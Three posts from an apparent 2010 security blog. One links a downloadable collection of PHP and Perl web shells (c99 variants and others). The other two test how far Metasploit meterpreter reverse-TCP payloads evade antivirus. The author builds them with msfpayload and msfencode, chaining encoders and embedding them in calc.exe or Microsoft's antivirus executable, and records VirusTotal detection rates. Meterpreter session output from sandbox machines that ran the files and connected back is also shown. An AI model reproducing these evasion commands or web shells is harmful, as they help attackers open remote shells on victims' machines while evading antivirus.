Wednesday, March 31, 2010

php shell scripts

I found today an interesting collection of php shellscripts feel free to give it a check if interested. There is also a nice collection from DK at http://michaeldaw.org/projects/web-backdoor-compilation.

Names,
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php

Some are modified versions of c99.php some seem custom. 
Link to download here.

Tuesday, March 30, 2010

metasploit vs virustotal part 2

I really wanted to see what was inside the analysis folder and have some better statistic results from the antivirus. At that time, metasploit integrated a patch from scriptjunkie ( http://www.metasploit.com/redmine/issues/1244 ), so i gave it a try also.

Detection rates and examples follow below, all result rates are from virustotal:

( calc.exe is calculator from windows XP and -k is the new command on msfencode to bind two files together and execute both of them in a separate thread )

./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe

Result: 14/42 (33.34%)

Immediately when i uploaded the file i got a connection in my multi/handler,

[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe

Too bad i didn't see the analysis folder that i was looking. The connection was dropped 2-3 seconds later i assume the whole connection is lasting 10 seconds and the VM machine from what it appears it's rebooted or disconnected.

Trying again,

./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)

Same template, but without binding of the exe files it was not bad actually.

With different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)

Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai the default encoder, gave a result of Result: 12/42 (28.58%).

I got almost the same results increasing the encoding times to 15
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)

And last one using XOR encoder
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)

Plain encoding of the payload gives a detection rate of 20/42 (47.62%) (Shikata ga nai)

From what i noticed binding the exe file raises the changes of detection, most of the times the antivirus that are detecting the executables are the same, Microsoft, Nod32, Symantec, Sophos and something called McAfee-GW-Edition that is detecting anything as virus even plain text and incomplete code.

I really didn't wanted to put metasploit code into virustotal but i haven't seen any actual tests and results anywhere. I did some tests on novirusthanks ( http://scanner.novirusthanks.org/) but the scanner is slow, the results are poor and there are half, 20 only, antivirus engines on the scanner.

That's all for now, i didn't manage to get the files that i wanted, i manage to get some results on detection and some information from the VM's that were connecting back every time that i was uploading a file. Files are available on request.

metasploit vs virustotal

A few days back i saw a post (http://practicalexploitation.com/post/417194846/rob-could-you-cover-anti-virus-evasion-i-was-going) on tactical exploitation from jeffhnet, asking for help on bypassing AVGs. Trying to do the same I've started with metasploit's meterpreter and the usual attempts to bypass AVG.

First attempt, got a high rate of red flags, on virustotal and novirusthanks, around 35% to 40%. The command that i had used were:

./msfpayload windows/meterpreter/reverse_
tcp LHOST=myhost raw | ./msfencode -b '' -t exe -o test1.exe

I changed the encoder and i got some slightly better results with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -e x86/call4_dword_xor -t exe -o test2-0.exe

Finally i ended with

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x msseces.exe -t exe -o test2-5-mss.exe

Msseces.exe is the Microsoft antivirus and i used it as template for the msfencode. It produced a nice big exe that was almost undetectable. Actually 3 hits in novirusthanks and Result: 5/41 (12.2%) on virustotal ( MD5...: ca904e0c8ac8ec6e34b85f5c1c9b36bb ) . Roughly good results the only thing that was bothering me was that the file is being detected by Microsoft NOD32 and Symantec, but i settle to give it another try the next day.

So i fired up today msfconsole and multi handler to be ready to test my exe files, as i was going to scramble them with some commercial packers/encryptors/protectors. As i was going through a list of protectors to start i saw a strange connection to my console

[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...

[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)

I did immediately an ls and i saw the following

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp

The 0B7BBu.exe was the same size as my file, and the process list:

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1200 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1336 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.exe
940 alg.exe x86 C:\WINDOWS\System32\alg.exe
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe


So that's about it, the connection was dropped after that, and in a couple of days my file will be marked from more engines as viral i guess.

Next thing that i'll like to do is to find out from where this connection came. Was it cause the file was on novirusthanks that claims they do not distribute the sample, or from virustotal.

More on part 2